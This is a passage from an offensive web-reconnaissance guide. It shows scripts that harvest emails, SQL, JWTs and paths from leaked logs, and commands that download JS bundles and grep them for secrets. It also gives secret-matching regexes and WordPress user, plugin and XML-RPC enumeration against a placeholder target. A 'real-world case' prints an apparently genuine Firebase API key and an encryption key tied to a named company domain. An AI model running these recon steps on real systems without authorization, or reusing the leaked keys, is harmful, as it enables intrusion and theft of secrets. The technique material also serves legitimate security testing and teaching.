&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;emails &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;[\w.+-]+@[\w-]+\.[\w.-]+&amp;#39;&lt;/span&gt;, log))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; e &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;sorted&lt;/span&gt;(emails):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;not&lt;/span&gt; e&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;endswith((&lt;span style="color:#a6d189"&gt;&amp;#39;.png&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.jpg&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.svg&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.css&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.js&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.ico&amp;#39;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#39;.woff&amp;#39;&lt;/span&gt;)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;📧 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;e&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract SQL queries&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sqls &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:SQL:|Executing query:|query:)\s*(.*?)(?:&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\\&lt;/span&gt;&lt;span style="color:#a6d189"&gt;|$)&amp;#39;&lt;/span&gt;, log)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; s &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(sqls):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(s) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;10&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🗄️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;s[:&lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract JWT tokens&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jwts &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}&amp;#39;&lt;/span&gt;, log)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; j &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(jwts):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔑 JWT: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;j[:&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract stack traces (system paths)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:in |at )/(?:[a-zA-Z0-9_\-./]+\.(?:php|js|ts|py|rb))&amp;#39;&lt;/span&gt;, log))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; p &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;sorted&lt;/span&gt;(paths):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;📁 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="6-js-bundle--source-map-analysis" &gt;
&lt;div&gt;
&lt;a href="#6-js-bundle--source-map-analysis"&gt;
#
&lt;/a&gt;
6. JS BUNDLE &amp;amp; SOURCE MAP ANALYSIS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="61-why-analyze-js-bundles" &gt;
&lt;div&gt;
&lt;a href="#61-why-analyze-js-bundles"&gt;
##
&lt;/a&gt;
6.1 Why Analyze JS Bundles
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Modern JavaScript bundles (Webpack, Vite, esbuild) often contain:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hardcoded API keys and tokens&lt;/li&gt;
&lt;li&gt;Internal API URLs&lt;/li&gt;
&lt;li&gt;Firebase, Auth0, Supabase configurations&lt;/li&gt;
&lt;li&gt;Environment variables (VITE_&lt;em&gt;, REACT_APP_&lt;/em&gt;, NEXT_PUBLIC_*)&lt;/li&gt;
&lt;li&gt;Internal routes&lt;/li&gt;
&lt;li&gt;Feature flags&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="62-bundle-download-and-analysis" &gt;
&lt;div&gt;
&lt;a href="#62-bundle-download-and-analysis"&gt;
##
&lt;/a&gt;
6.2 Bundle Download and Analysis
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download the main HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; &amp;gt; index.html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract JS bundle URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;src=&amp;#34;[^&amp;#34;]*\.js&amp;#34;&amp;#39;&lt;/span&gt; index.html | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;&amp;#39;&lt;/span&gt; -f2 | &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; js; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$js&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &amp;gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;basename &lt;span style="color:#f2d5cf"&gt;$js&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search for secrets in bundles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rPn &lt;span style="color:#a6d189"&gt;&amp;#34;(?:apiKey|api_key|API_KEY|token|secret|password|clientId|client_id|auth0|firebase|supabase)[\&amp;#34;&amp;#39;]?\s*[:=]\s*[\&amp;#34;&amp;#39;][^\&amp;#34;&amp;#39;]{8,}&amp;#34;&lt;/span&gt; *.js
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="63-source-maps--source-code-reconstruction" &gt;
&lt;div&gt;
&lt;a href="#63-source-maps--source-code-reconstruction"&gt;
##
&lt;/a&gt;
6.3 Source Maps — Source Code Reconstruction
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Source maps (&lt;code&gt;.js.map&lt;/code&gt;) reconstruct the original TypeScript/ES6 code, exposing ALL frontend logic.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if source maps are exposed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/assets/index-abc123.js.map&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/static/js/main.12345.js.map&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If they exist (HTTP 200), download and use:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://unminify.com or https://source-map-visualization.netlify.app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: In an enterprise Angular SPA admin, 2 JS bundles of 250KB each exposed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Internal API URL (&lt;code&gt;apiv3.empresa.com.br&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Firebase API key (&lt;code&gt;AIzaSyCnQ7hg9qn8mrS3zSLX-xeXX3wKbuC2GXA&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Encryption keys (&lt;code&gt;AD5oDjsJaTJOzLe1Llj9mz&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Cloudinary upload endpoint&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="64-regex-patterns-for-secrets-in-js" &gt;
&lt;div&gt;
&lt;a href="#64-regex-patterns-for-secrets-in-js"&gt;
##
&lt;/a&gt;
6.4 Regex Patterns for Secrets in JS
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patterns &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Firebase API Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;apiKey:\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([A-Za-z0-9_\-]{30,})&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:AKIA|ASIA)[A-Z0-9]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{16}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Google API Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;AIza[0-9A-Za-z\-_]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{35}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{10,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mercado Pago&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;APP_USR-[a-f0-9]{8,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Stripe&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:sk_live|pk_live)_[A-Za-z0-9]{24,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Auth0 Domain&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:domain|auth0_domain):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]+\.auth0\.com)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Auth0 Client ID&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:client_id|clientId|AUTH0_CLIENT_ID):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]{20,})&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseUrl|SUPABASE_URL):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](https://[^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]+\.supabase\.co)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseKey|anonKey|SUPABASE_ANON_KEY):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Heroku&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{8}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{4}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{4}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{4}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{12}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Generic Secret&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:secret|password|token|key):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]{8,})&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="7-wordpress-deep-dive" &gt;
&lt;div&gt;
&lt;a href="#7-wordpress-deep-dive"&gt;
#
&lt;/a&gt;
7. WORDPRESS DEEP DIVE
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="71-version-and-plugin-detection" &gt;
&lt;div&gt;
&lt;a href="#71-version-and-plugin-detection"&gt;
##
&lt;/a&gt;
7.1 Version and Plugin Detection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Version in HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;generator&amp;#34;[^&amp;gt;]+content=&amp;#34;WordPress [0-9.]+&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Active plugins (via HTML)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#34;wp-content/plugins/[^/&amp;#39;\&amp;#34;]+&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Themes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#34;wp-content/themes/[^/&amp;#39;\&amp;#34;]+&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Users via REST API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/users&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Users via author ID (test 1-20)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; 20&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/?author=&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$id&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;location&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Readme (exact version)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/readme.html&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;version&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="72-xml-rpc--the-most-dangerous-wordpress-attack-surface" &gt;
&lt;div&gt;
&lt;a href="#72-xml-rpc--the-most-dangerous-wordpress-attack-surface"&gt;
##
&lt;/a&gt;
7.2 XML-RPC — The Most Dangerous WordPress Attack Surface
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When active, XML-RPC is a massive attack vector.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if active&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/xmlrpc.php&amp;#34;&lt;/span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;?xml version=&amp;#34;1.0&amp;#34;?&amp;gt;&amp;lt;methodCall&amp;gt;&amp;lt;methodName&amp;gt;system.listMethods&amp;lt;/methodName&amp;gt;&amp;lt;/methodCall&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List ALL available methods (80+ on real sites)&lt;/span&gt;
